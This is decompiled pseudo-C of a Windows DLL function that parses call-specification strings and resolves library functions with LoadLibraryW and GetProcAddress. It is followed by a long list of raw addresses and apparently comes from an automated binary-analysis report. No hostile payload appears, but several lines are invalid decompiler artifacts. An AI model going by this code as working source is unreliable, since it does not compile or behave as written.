                                                                                                                        									if(_t250 == _t284) {
                                                                                                                        										break;
                                                                                                                        									}
                                                                                                                        									_t329 = _t333;
                                                                                                                        									_t333 = _t250;
                                                                                                                        									__eflags = _t333 - _t284;
                                                                                                                        									if(_t333 != _t284) {
                                                                                                                        										continue;
                                                                                                                        									}
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								__eflags = _t329 - _t284;
                                                                                                                        								if(_t329 != _t284) {
                                                                                                                        									 *(_t329 + 0x1ca0) = _t284;
                                                                                                                        								}
                                                                                                                        								_t251 =  *(_t333 + 0x1010);
                                                                                                                        								__eflags = _t251 & 0x00000008;
                                                                                                                        								if((_t251 & 0x00000008) == 0) {
                                                                                                                        									_t252 = _t251 | 0x00000002;
                                                                                                                        									__eflags = _t252;
                                                                                                                        									 *(_t333 + 0x1010) = _t252;
                                                                                                                        								} else {
                                                                                                                        									_t333 = E70B2162F(_t333);
                                                                                                                        									 *(_t333 + 0x1010) =  *(_t333 + 0x1010) & 0xfffffff5;
                                                                                                                        								}
                                                                                                                        								goto L42;
                                                                                                                        							} else {
                                                                                                                        								_t301 = _t289 - 1;
                                                                                                                        								__eflags = _t301;
                                                                                                                        								if(_t301 == 0) {
                                                                                                                        									L31:
                                                                                                                        									lstrcpyW(_t218, _v48);
                                                                                                                        									L32:
                                                                                                                        									lstrcpyW(_t323, _v24);
                                                                                                                        									L42:
                                                                                                                        									_v12 = _v12 + 2;
                                                                                                                        									_v28 = _v24;
                                                                                                                        									L59:
                                                                                                                        									if(_v32 != 0xffffffff) {
                                                                                                                        										_t322 = _v12;
                                                                                                                        										continue;
                                                                                                                        									}
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								_t302 = _t301 - 1;
                                                                                                                        								__eflags = _t302;
                                                                                                                        								if(_t302 == 0) {
                                                                                                                        									goto L32;
                                                                                                                        								}
                                                                                                                        								__eflags = _t302 != 1;
                                                                                                                        								if(_t302 != 1) {
                                                                                                                        									goto L42;
                                                                                                                        								}
                                                                                                                        								goto L31;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						if(_t216 == 1) {
                                                                                                                        							_t258 = _v16;
                                                                                                                        							if(_v40 == _t284) {
                                                                                                                        								_t258 = _t258 - 1;
                                                                                                                        							}
                                                                                                                        							 *(_t333 + 0x1014) = _t258;
                                                                                                                        						}
                                                                                                                        						goto L42;
                                                                                                                        					}
                                                                                                                        					_t259 = _t214 - 0x23;
                                                                                                                        					if(_t259 == 0) {
                                                                                                                        						__eflags = _t322 - _v56;
                                                                                                                        						if(_t322 <= _v56) {
                                                                                                                        							L17:
                                                                                                                        							__eflags = _v44 - _t284;
                                                                                                                        							if(_v44 != _t284) {
                                                                                                                        								L43:
                                                                                                                        								_t261 = _v32 - _t284;
                                                                                                                        								__eflags = _t261;
                                                                                                                        								if(_t261 == 0) {
                                                                                                                        									_t262 = _t287;
                                                                                                                        									while(1) {
                                                                                                                        										__eflags = _t262 - 0x22;
                                                                                                                        										if(_t262 != 0x22) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										_t322 =  &(_t322[1]);
                                                                                                                        										__eflags = _v44 - _t284;
                                                                                                                        										_v12 = _t322;
                                                                                                                        										if(_v44 == _t284) {
                                                                                                                        											_v44 = 1;
                                                                                                                        											L163:
                                                                                                                        											_v28 =  &(_v28[0]);
                                                                                                                        											 *_v28 =  *_t322;
                                                                                                                        											L58:
                                                                                                                        											_t332 =  &(_t322[1]);
                                                                                                                        											__eflags = _t332;
                                                                                                                        											_v12 = _t332;
                                                                                                                        											goto L59;
                                                                                                                        										}
                                                                                                                        										_t262 =  *_t322 & 0x0000ffff;
                                                                                                                        										_v44 = _t284;
                                                                                                                        									}
                                                                                                                        									__eflags = _t262 - 0x2a;
                                                                                                                        									if(_t262 == 0x2a) {
                                                                                                                        										_v36 = 2;
                                                                                                                        										L57:
                                                                                                                        										_t322 = _v12;
                                                                                                                        										_v28 = _v24;
                                                                                                                        										_t284 = 0;
                                                                                                                        										__eflags = 0;
                                                                                                                        										goto L58;
                                                                                                                        									}
                                                                                                                        									__eflags = _t262 - 0x2d;
                                                                                                                        									if(_t262 == 0x2d) {
                                                                                                                        										L152:
                                                                                                                        										_t305 =  *_t322;
                                                                                                                        										__eflags = _t305 - 0x2d;
                                                                                                                        										if(_t305 != 0x2d) {
                                                                                                                        											L155:
                                                                                                                        											_t265 =  &(_t322[1]);
                                                                                                                        											__eflags =  *_t265 - 0x3a;
                                                                                                                        											if( *_t265 != 0x3a) {
                                                                                                                        												goto L163;
                                                                                                                        											}
                                                                                                                        											__eflags = _t305 - 0x2d;
                                                                                                                        											if(_t305 == 0x2d) {
                                                                                                                        												goto L163;
                                                                                                                        											}
                                                                                                                        											_v36 = 1;
                                                                                                                        											L158:
                                                                                                                        											_v12 = _t265;
                                                                                                                        											__eflags = _v28 - _v24;
                                                                                                                        											if(_v28 <= _v24) {
                                                                                                                        												 *_v48 = _t284;
                                                                                                                        											} else {
                                                                                                                        												 *_v28 = _t284;
                                                                                                                        												lstrcpyW(_v48, _v24);
                                                                                                                        											}
                                                                                                                        											goto L57;
                                                                                                                        										}
                                                                                                                        										_t265 =  &(_t322[1]);
                                                                                                                        										__eflags =  *_t265 - 0x3e;
                                                                                                                        										if( *_t265 != 0x3e) {
                                                                                                                        											goto L155;
                                                                                                                        										}
                                                                                                                        										_v36 = 3;
                                                                                                                        										goto L158;
                                                                                                                        									}
                                                                                                                        									__eflags = _t262 - 0x3a;
                                                                                                                        									if(_t262 != 0x3a) {
                                                                                                                        										goto L163;
                                                                                                                        									}
                                                                                                                        									goto L152;
                                                                                                                        								}
                                                                                                                        								_t270 = _t261 - 1;
                                                                                                                        								__eflags = _t270;
                                                                                                                        								if(_t270 == 0) {
                                                                                                                        									L80:
                                                                                                                        									_t306 = _t287 + 0xffffffde;
                                                                                                                        									__eflags = _t306 - 0x55;
                                                                                                                        									if(_t306 > 0x55) {
                                                                                                                        										goto L57;
                                                                                                                        									}
                                                                                                                        									switch( *((intOrPtr*)(( *(_t306 + 0x70b223e8) & 0x000000ff) * 4 +  &M70B2235C))) {
                                                                                                                        										case 0:
                                                                                                                        											__ecx = _v24;
                                                                                                                        											__edi = _v12;
                                                                                                                        											while(1) {
                                                                                                                        												__edi = __edi + 1;
                                                                                                                        												__edi = __edi + 1;
                                                                                                                        												_v12 = __edi;
                                                                                                                        												__ax =  *__edi;
                                                                                                                        												__eflags = __ax - __dx;
                                                                                                                        												if(__ax != __dx) {
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        												L132:
                                                                                                                        												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                                                                                        												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                                                                                        													L137:
                                                                                                                        													 *__ecx =  *__ecx & 0x00000000;
                                                                                                                        													__eax = E70B212CC(_v24);
                                                                                                                        													__ebx = __eax;
                                                                                                                        													goto L97;
                                                                                                                        												}
                                                                                                                        												L133:
                                                                                                                        												__eflags = __ax;
                                                                                                                        												if(__ax == 0) {
                                                                                                                        													goto L137;
                                                                                                                        												}
                                                                                                                        												__eflags = __ax - __dx;
                                                                                                                        												if(__ax == __dx) {
                                                                                                                        													__edi = __edi + 1;
                                                                                                                        													__edi = __edi + 1;
                                                                                                                        													__eflags = __edi;
                                                                                                                        												}
                                                                                                                        												__ax =  *__edi;
                                                                                                                        												 *__ecx =  *__edi;
                                                                                                                        												__ecx = __ecx + 1;
                                                                                                                        												__ecx = __ecx + 1;
                                                                                                                        												__edi = __edi + 1;
                                                                                                                        												__edi = __edi + 1;
                                                                                                                        												_v12 = __edi;
                                                                                                                        												__ax =  *__edi;
                                                                                                                        												__eflags = __ax - __dx;
                                                                                                                        												if(__ax != __dx) {
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        												goto L132;
                                                                                                                        											}
                                                                                                                        										case 1:
                                                                                                                        											_v8 = 1;
                                                                                                                        											goto L57;
                                                                                                                        										case 2:
                                                                                                                        											_v8 = _v8 | 0xffffffff;
                                                                                                                        											goto L57;
                                                                                                                        										case 3:
                                                                                                                        											_v8 = _v8 & 0x00000000;
                                                                                                                        											_v20 = _v20 & 0x00000000;
                                                                                                                        											_v16 = _v16 + 1;
                                                                                                                        											goto L85;
                                                                                                                        										case 4:
                                                                                                                        											__eflags = _v20;
                                                                                                                        											if(_v20 != 0) {
                                                                                                                        												goto L57;
                                                                                                                        											}
                                                                                                                        											_v12 = _v12 - 2;
                                                                                                                        											__ebx = E70B212BB();
                                                                                                                        											 &_v12 = E70B21B86( &_v12);
                                                                                                                        											__eax = E70B21510(__edx, __eax, __edx, __ebx);
                                                                                                                        											goto L97;
                                                                                                                        										case 5:
                                                                                                                        											_v20 = _v20 + 1;
                                                                                                                        											goto L57;
                                                                                                                        										case 6:
                                                                                                                        											_push(7);
                                                                                                                        											goto L124;
                                                                                                                        										case 7:
                                                                                                                        											_push(0x19);
                                                                                                                        											goto L144;
                                                                                                                        										case 8:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L108;
                                                                                                                        										case 9:
                                                                                                                        											_push(0x15);
                                                                                                                        											goto L144;
                                                                                                                        										case 0xa:
                                                                                                                        											_push(0x16);
                                                                                                                        											goto L144;
                                                                                                                        										case 0xb:
                                                                                                                        											_push(0x18);
                                                                                                                        											goto L144;
                                                                                                                        										case 0xc:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L119;
                                                                                                                        										case 0xd:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L110;
                                                                                                                        										case 0xe:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L112;
                                                                                                                        										case 0xf:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L123;
                                                                                                                        										case 0x10:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L114;
                                                                                                                        										case 0x11:
                                                                                                                        											_push(3);
                                                                                                                        											goto L124;
                                                                                                                        										case 0x12:
                                                                                                                        											_push(0x17);
                                                                                                                        											L144:
                                                                                                                        											_pop(__ebx);
                                                                                                                        											goto L98;
                                                                                                                        										case 0x13:
                                                                                                                        											__eax =  &_v12;
                                                                                                                        											__eax = E70B21B86( &_v12);
                                                                                                                        											__ebx = __eax;
                                                                                                                        											__ebx = __eax + 1;
                                                                                                                        											__eflags = __ebx - 0xb;
                                                                                                                        											if(__ebx < 0xb) {
                                                                                                                        												__ebx = __ebx + 0xa;
                                                                                                                        											}
                                                                                                                        											goto L97;
                                                                                                                        										case 0x14:
                                                                                                                        											__ebx = 0xffffffff;
                                                                                                                        											goto L98;
                                                                                                                        										case 0x15:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L117;
                                                                                                                        										case 0x16:
                                                                                                                        											__ecx = 0;
                                                                                                                        											__eflags = 0;
                                                                                                                        											goto L91;
                                                                                                                        										case 0x17:
                                                                                                                        											__eax = 0;
                                                                                                                        											__eax = 1;
                                                                                                                        											__eflags = 1;
                                                                                                                        											goto L121;
                                                                                                                        										case 0x18:
                                                                                                                        											_t272 =  *(_t333 + 0x1014);
                                                                                                                        											__eflags = _t272 - _v16;
                                                                                                                        											if(_t272 > _v16) {
                                                                                                                        												_v16 = _t272;
                                                                                                                        											}
                                                                                                                        											_v8 = _v8 & 0x00000000;
                                                                                                                        											_v20 = _v20 & 0x00000000;
                                                                                                                        											_v36 - 3 = _t272 - (_v36 == 3);
                                                                                                                        											if(_t272 != _v36 == 3) {
                                                                                                                        												L85:
                                                                                                                        												_v40 = 1;
                                                                                                                        											}
                                                                                                                        											goto L57;
                                                                                                                        										case 0x19:
                                                                                                                        											L108:
                                                                                                                        											__ecx = 0;
                                                                                                                        											_v8 = 2;
                                                                                                                        											__ecx = 1;
                                                                                                                        											goto L91;
                                                                                                                        										case 0x1a:
                                                                                                                        											L119:
                                                                                                                        											_push(5);
                                                                                                                        											goto L124;
                                                                                                                        										case 0x1b:
                                                                                                                        											L110:
                                                                                                                        											__ecx = 0;
                                                                                                                        											_v8 = 3;
                                                                                                                        											__ecx = 1;
                                                                                                                        											goto L91;
                                                                                                                        										case 0x1c:
                                                                                                                        											L112:
                                                                                                                        											__ecx = 0;
                                                                                                                        											__ecx = 1;
                                                                                                                        											goto L91;
                                                                                                                        										case 0x1d:
                                                                                                                        											L123:
                                                                                                                        											_push(6);
                                                                                                                        											goto L124;
                                                                                                                        										case 0x1e:
                                                                                                                        											L114:
                                                                                                                        											_push(2);
                                                                                                                        											goto L124;
                                                                                                                        										case 0x1f:
                                                                                                                        											__eax =  &_v12;
                                                                                                                        											__eax = E70B21B86( &_v12);
                                                                                                                        											__ebx = __eax;
                                                                                                                        											__ebx = __eax + 1;
                                                                                                                        											goto L97;
                                                                                                                        										case 0x20:
                                                                                                                        											L117:
                                                                                                                        											_v52 = _v52 + 1;
                                                                                                                        											_push(4);
                                                                                                                        											_pop(__ecx);
                                                                                                                        											goto L91;
                                                                                                                        										case 0x21:
                                                                                                                        											L121:
                                                                                                                        											_push(4);
                                                                                                                        											L124:
                                                                                                                        											_pop(__ecx);
                                                                                                                        											L91:
                                                                                                                        											__edi = _v16;
                                                                                                                        											__edx =  *(0x70b2405c + __ecx * 4);
                                                                                                                        											__eax =  ~__eax;
                                                                                                                        											asm("sbb eax, eax");
                                                                                                                        											_v40 = 1;
                                                                                                                        											__edi = _v16 << 5;
                                                                                                                        											__eax = __eax & 0x00008000;
                                                                                                                        											__edi = (_v16 << 5) + __esi;
                                                                                                                        											__eax = __eax | __ecx;
                                                                                                                        											__eflags = _v8;
                                                                                                                        											 *(__edi + 0x1018) = __eax;
                                                                                                                        											if(_v8 < 0) {
                                                                                                                        												L93:
                                                                                                                        												__edx = 0;
                                                                                                                        												__edx = 1;
                                                                                                                        												__eflags = 1;
                                                                                                                        												L94:
                                                                                                                        												__eflags = _v8 - 1;
                                                                                                                        												 *(__edi + 0x1028) = __edx;
                                                                                                                        												if(_v8 == 1) {
                                                                                                                        													__eax =  &_v12;
                                                                                                                        													__eax = E70B21B86( &_v12);
                                                                                                                        													__eax = __eax + 1;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													_v8 = __eax;
                                                                                                                        												}
                                                                                                                        												__eax = _v8;
                                                                                                                        												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                                                                                        												_t136 = _v16 + 0x81; // 0x81
                                                                                                                        												_t136 = _t136 << 5;
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags = 0;
                                                                                                                        												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                                                                                        												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                                                                                        												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                                                                                        												L97:
                                                                                                                        												__eflags = __ebx;
                                                                                                                        												if(__ebx == 0) {
                                                                                                                        													goto L57;
                                                                                                                        												}
                                                                                                                        												L98:
                                                                                                                        												__eflags = _v20;
                                                                                                                        												_v40 = 1;
                                                                                                                        												if (_v20 != 0) goto L104;
                                                                                                                        												__cl = __cl &  *(__ebx - 0x1f3e0bbb);
                                                                                                                        												__eflags = __cl;
                                                                                                                        											}
                                                                                                                        											__eflags = __edx;
                                                                                                                        											if(__edx > 0) {
                                                                                                                        												goto L94;
                                                                                                                        											}
                                                                                                                        											goto L93;
                                                                                                                        										case 0x22:
                                                                                                                        											goto L57;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t273 = _t270 - 1;
                                                                                                                        								__eflags = _t273;
                                                                                                                        								if(_t273 == 0) {
                                                                                                                        									_v16 = _t284;
                                                                                                                        									goto L80;
                                                                                                                        								}
                                                                                                                        								__eflags = _t273 != 1;
                                                                                                                        								if(_t273 != 1) {
                                                                                                                        									goto L163;
                                                                                                                        								}
                                                                                                                        								__eflags = _t287 - 0x6e;
                                                                                                                        								if(__eflags > 0) {
                                                                                                                        									_t310 = _t287 - 0x72;
                                                                                                                        									__eflags = _t310;
                                                                                                                        									if(_t310 == 0) {
                                                                                                                        										_push(4);
                                                                                                                        										L74:
                                                                                                                        										_pop(_t275);
                                                                                                                        										L75:
                                                                                                                        										__eflags = _v8 - 1;
                                                                                                                        										if(_v8 != 1) {
                                                                                                                        											_t96 = _t333 + 0x1010;
                                                                                                                        											 *_t96 =  *(_t333 + 0x1010) &  !_t275;
                                                                                                                        											__eflags =  *_t96;
                                                                                                                        										} else {
                                                                                                                        											 *(_t333 + 0x1010) =  *(_t333 + 0x1010) | _t275;
                                                                                                                        										}
                                                                                                                        										_v8 = 1;
                                                                                                                        										goto L57;
                                                                                                                        									}
                                                                                                                        									_t313 = _t310 - 1;
                                                                                                                        									__eflags = _t313;
                                                                                                                        									if(_t313 == 0) {
                                                                                                                        										_push(0x10);
                                                                                                                        										goto L74;
                                                                                                                        									}
                                                                                                                        									__eflags = _t313 != 0;
                                                                                                                        									if(_t313 != 0) {
                                                                                                                        										goto L57;
                                                                                                                        									}
                                                                                                                        									_push(0x40);
                                                                                                                        									goto L74;
                                                                                                                        								}
                                                                                                                        								if(__eflags == 0) {
                                                                                                                        									_push(8);
                                                                                                                        									goto L74;
                                                                                                                        								}
                                                                                                                        								_t316 = _t287 - 0x21;
                                                                                                                        								__eflags = _t316;
                                                                                                                        								if(_t316 == 0) {
                                                                                                                        									_v8 =  ~_v8;
                                                                                                                        									goto L57;
                                                                                                                        								}
                                                                                                                        								_t317 = _t316 - 0x11;
                                                                                                                        								__eflags = _t317;
                                                                                                                        								if(_t317 == 0) {
                                                                                                                        									_t275 = 0x100;
                                                                                                                        									goto L75;
                                                                                                                        								}
                                                                                                                        								_t318 = _t317 - 0x31;
                                                                                                                        								__eflags = _t318;
                                                                                                                        								if(_t318 == 0) {
                                                                                                                        									_t275 = 1;
                                                                                                                        									goto L75;
                                                                                                                        								}
                                                                                                                        								__eflags = _t318 != 0;
                                                                                                                        								if(_t318 != 0) {
                                                                                                                        									goto L57;
                                                                                                                        								}
                                                                                                                        								_push(0x20);
                                                                                                                        								goto L74;
                                                                                                                        							} else {
                                                                                                                        								_v32 = _t284;
                                                                                                                        								_v36 = _t284;
                                                                                                                        								goto L20;
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						__eflags =  *((short*)(_t322 - 2)) - 0x3a;
                                                                                                                        						if( *((short*)(_t322 - 2)) != 0x3a) {
                                                                                                                        							goto L17;
                                                                                                                        						}
                                                                                                                        						__eflags = _v32 - _t284;
                                                                                                                        						if(_v32 == _t284) {
                                                                                                                        							goto L43;
                                                                                                                        						}
                                                                                                                        						goto L17;
                                                                                                                        					}
                                                                                                                        					_t278 = _t259 - 5;
                                                                                                                        					if(_t278 == 0) {
                                                                                                                        						__eflags = _v44 - _t284;
                                                                                                                        						if(_v44 != _t284) {
                                                                                                                        							goto L43;
                                                                                                                        						} else {
                                                                                                                        							__eflags = _v36 - 3;
                                                                                                                        							_v32 = 1;
                                                                                                                        							_v8 = _t284;
                                                                                                                        							_v20 = _t284;
                                                                                                                        							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                                                                                        							_v40 = _t284;
                                                                                                                        							goto L20;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t282 = _t278 - 1;
                                                                                                                        					if(_t282 == 0) {
                                                                                                                        						__eflags = _v44 - _t284;
                                                                                                                        						if(_v44 != _t284) {
                                                                                                                        							goto L43;
                                                                                                                        						} else {
                                                                                                                        							_v32 = 2;
                                                                                                                        							_v8 = _t284;
                                                                                                                        							_v20 = _t284;
                                                                                                                        							goto L20;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if(_t282 != 0x16) {
                                                                                                                        						goto L43;
                                                                                                                        					} else {
                                                                                                                        						_v32 = 3;
                                                                                                                        						_v8 = 1;
                                                                                                                        						goto L20;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				GlobalFree(_v56);
                                                                                                                        				GlobalFree(_v24);
                                                                                                                        				GlobalFree(_v48);
                                                                                                                        				if(_t333 == _t284 ||  *(_t333 + 0x100c) != _t284) {
                                                                                                                        					L183:
                                                                                                                        					return _t333;
                                                                                                                        				} else {
                                                                                                                        					_t226 =  *_t333 - 1;
                                                                                                                        					if(_t226 == 0) {
                                                                                                                        						_t188 = _t333 + 8; // 0x8
                                                                                                                        						_t325 = _t188;
                                                                                                                        						__eflags =  *_t325 - _t284;
                                                                                                                        						if( *_t325 != _t284) {
                                                                                                                        							_t227 = GetModuleHandleW(_t325);
                                                                                                                        							__eflags = _t227 - _t284;
                                                                                                                        							 *(_t333 + 0x1008) = _t227;
                                                                                                                        							if(_t227 != _t284) {
                                                                                                                        								L172:
                                                                                                                        								_t193 = _t333 + 0x808; // 0x808
                                                                                                                        								_t326 = _t193;
                                                                                                                        								_t228 = E70B216BD( *(_t333 + 0x1008), _t326);
                                                                                                                        								__eflags = _t228 - _t284;
                                                                                                                        								 *(_t333 + 0x100c) = _t228;
                                                                                                                        								if(_t228 == _t284) {
                                                                                                                        									__eflags =  *_t326 - 0x23;
                                                                                                                        									if( *_t326 == 0x23) {
                                                                                                                        										_t196 = _t333 + 0x80a; // 0x80a
                                                                                                                        										_t232 = E70B213B1(_t196);
                                                                                                                        										__eflags = _t232 - _t284;
                                                                                                                        										if(_t232 != _t284) {
                                                                                                                        											__eflags = _t232 & 0xffff0000;
                                                                                                                        											if((_t232 & 0xffff0000) == 0) {
                                                                                                                        												 *(_t333 + 0x100c) = GetProcAddress( *(_t333 + 0x1008), _t232 & 0x0000ffff);
                                                                                                                        											}
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								__eflags = _v52 - _t284;
                                                                                                                        								if(_v52 != _t284) {
                                                                                                                        									L179:
                                                                                                                        									_t326[lstrlenW(_t326)] = 0x57;
                                                                                                                        									_t230 = E70B216BD( *(_t333 + 0x1008), _t326);
                                                                                                                        									__eflags = _t230 - _t284;
                                                                                                                        									if(_t230 != _t284) {
                                                                                                                        										L167:
                                                                                                                        										 *(_t333 + 0x100c) = _t230;
                                                                                                                        										goto L183;
                                                                                                                        									}
                                                                                                                        									__eflags =  *(_t333 + 0x100c) - _t284;
                                                                                                                        									L181:
                                                                                                                        									if(__eflags != 0) {
                                                                                                                        										goto L183;
                                                                                                                        									}
                                                                                                                        									L182:
                                                                                                                        									_t207 = _t333 + 4;
                                                                                                                        									 *_t207 =  *(_t333 + 4) | 0xffffffff;
                                                                                                                        									__eflags =  *_t207;
                                                                                                                        									goto L183;
                                                                                                                        								} else {
                                                                                                                        									__eflags =  *(_t333 + 0x100c) - _t284;
                                                                                                                        									if( *(_t333 + 0x100c) != _t284) {
                                                                                                                        										goto L183;
                                                                                                                        									}
                                                                                                                        									goto L179;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							_t235 = LoadLibraryW(_t325);
                                                                                                                        							__eflags = _t235 - _t284;
                                                                                                                        							 *(_t333 + 0x1008) = _t235;
                                                                                                                        							if(_t235 == _t284) {
                                                                                                                        								goto L182;
                                                                                                                        							}
                                                                                                                        							goto L172;
                                                                                                                        						}
                                                                                                                        						_t189 = _t333 + 0x808; // 0x808
                                                                                                                        						_t237 = E70B213B1(_t189);
                                                                                                                        						 *(_t333 + 0x100c) = _t237;
                                                                                                                        						__eflags = _t237 - _t284;
                                                                                                                        						goto L181;
                                                                                                                        					}
                                                                                                                        					_t238 = _t226 - 1;
                                                                                                                        					if(_t238 == 0) {
                                                                                                                        						_t186 = _t333 + 0x808; // 0x808
                                                                                                                        						_t239 = _t186;
                                                                                                                        						__eflags =  *_t239 - _t284;
                                                                                                                        						if( *_t239 == _t284) {
                                                                                                                        							goto L183;
                                                                                                                        						}
                                                                                                                        						_t230 = E70B213B1(_t239);
                                                                                                                        						L166:
                                                                                                                        						goto L167;
                                                                                                                        					}
                                                                                                                        					if(_t238 != 1) {
                                                                                                                        						goto L183;
                                                                                                                        					}
                                                                                                                        					_t81 = _t333 + 8; // 0x8
                                                                                                                        					_t285 = _t81;
                                                                                                                        					_t327 = E70B213B1(_t81);
                                                                                                                        					 *(_t333 + 0x1008) = _t327;
                                                                                                                        					if(_t327 == 0) {
                                                                                                                        						goto L182;
                                                                                                                        					}
                                                                                                                        					 *(_t333 + 0x104c) =  *(_t333 + 0x104c) & 0x00000000;
                                                                                                                        					 *((intOrPtr*)(_t333 + 0x1050)) = E70B212CC(_t285);
                                                                                                                        					 *(_t333 + 0x103c) =  *(_t333 + 0x103c) & 0x00000000;
                                                                                                                        					 *((intOrPtr*)(_t333 + 0x1048)) = 1;
                                                                                                                        					 *((intOrPtr*)(_t333 + 0x1038)) = 1;
                                                                                                                        					_t90 = _t333 + 0x808; // 0x808
                                                                                                                        					_t230 =  *(_t327->i + E70B213B1(_t90) * 4);
                                                                                                                        					goto L166;
                                                                                                                        				}
                                                                                                                        			}

































































                                                                                                                        0x70b21de7
                                                                                                                        0x70b21dea
                                                                                                                        0x70b21dee
                                                                                                                        0x70b21e61
                                                                                                                        0x70b21e65
                                                                                                                        0x70b21c43
                                                                                                                        0x00000000
                                                                                                                        0x70b21c43
                                                                                                                        0x00000000
                                                                                                                        0x70b21e65
                                                                                                                        0x70b21d6b
                                                                                                                        0x70b21d6b
                                                                                                                        0x70b21d6c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21d6e
                                                                                                                        0x70b21d6f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21d6f
                                                                                                                        0x70b21d66
                                                                                                                        0x70b21d00
                                                                                                                        0x70b21d09
                                                                                                                        0x70b21d0c
                                                                                                                        0x70b21d19
                                                                                                                        0x70b21d19
                                                                                                                        0x70b21d0e
                                                                                                                        0x70b21d0e
                                                                                                                        0x00000000
                                                                                                                        0x70b21d00
                                                                                                                        0x70b21c68
                                                                                                                        0x70b21c6b
                                                                                                                        0x70b21cce
                                                                                                                        0x70b21cd1
                                                                                                                        0x70b21ce3
                                                                                                                        0x70b21ce3
                                                                                                                        0x70b21ce6
                                                                                                                        0x70b21df3
                                                                                                                        0x70b21df6
                                                                                                                        0x70b21df6
                                                                                                                        0x70b21df8
                                                                                                                        0x70b221ae
                                                                                                                        0x70b221c6
                                                                                                                        0x70b221c6
                                                                                                                        0x70b221c9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b221b3
                                                                                                                        0x70b221b4
                                                                                                                        0x70b221b7
                                                                                                                        0x70b221ba
                                                                                                                        0x70b22244
                                                                                                                        0x70b2224b
                                                                                                                        0x70b22251
                                                                                                                        0x70b22255
                                                                                                                        0x70b21e5c
                                                                                                                        0x70b21e5d
                                                                                                                        0x70b21e5d
                                                                                                                        0x70b21e5e
                                                                                                                        0x00000000
                                                                                                                        0x70b21e5e
                                                                                                                        0x70b221c0
                                                                                                                        0x70b221c3
                                                                                                                        0x70b221c3
                                                                                                                        0x70b221cb
                                                                                                                        0x70b221ce
                                                                                                                        0x70b22238
                                                                                                                        0x70b21e51
                                                                                                                        0x70b21e54
                                                                                                                        0x70b21e57
                                                                                                                        0x70b21e5a
                                                                                                                        0x70b21e5a
                                                                                                                        0x00000000
                                                                                                                        0x70b21e5a
                                                                                                                        0x70b221d0
                                                                                                                        0x70b221d3
                                                                                                                        0x70b221da
                                                                                                                        0x70b221da
                                                                                                                        0x70b221dd
                                                                                                                        0x70b221e1
                                                                                                                        0x70b221f5
                                                                                                                        0x70b221f5
                                                                                                                        0x70b221f8
                                                                                                                        0x70b221fc
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b221fe
                                                                                                                        0x70b22202
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b22204
                                                                                                                        0x70b2220b
                                                                                                                        0x70b2220b
                                                                                                                        0x70b22211
                                                                                                                        0x70b22214
                                                                                                                        0x70b22230
                                                                                                                        0x70b22216
                                                                                                                        0x70b2221f
                                                                                                                        0x70b22222
                                                                                                                        0x70b22222
                                                                                                                        0x00000000
                                                                                                                        0x70b22214
                                                                                                                        0x70b221e3
                                                                                                                        0x70b221e6
                                                                                                                        0x70b221ea
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b221ec
                                                                                                                        0x00000000
                                                                                                                        0x70b221ec
                                                                                                                        0x70b221d5
                                                                                                                        0x70b221d8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b221d8
                                                                                                                        0x70b21dfe
                                                                                                                        0x70b21dfe
                                                                                                                        0x70b21dff
                                                                                                                        0x70b21f49
                                                                                                                        0x70b21f49
                                                                                                                        0x70b21f50
                                                                                                                        0x70b21f53
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b21f60
                                                                                                                        0x00000000
                                                                                                                        0x70b2214b
                                                                                                                        0x70b2214e
                                                                                                                        0x70b22151
                                                                                                                        0x70b22151
                                                                                                                        0x70b22152
                                                                                                                        0x70b22153
                                                                                                                        0x70b22156
                                                                                                                        0x70b22159
                                                                                                                        0x70b2215c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x70b2215e
                                                                                                                        0x70b2215e
                                                                                                                        0x70b22162
                                                                                                                        0x70b2217a
                                                                                                                        0x70b2217d
                                                                                                                        0x70b22181
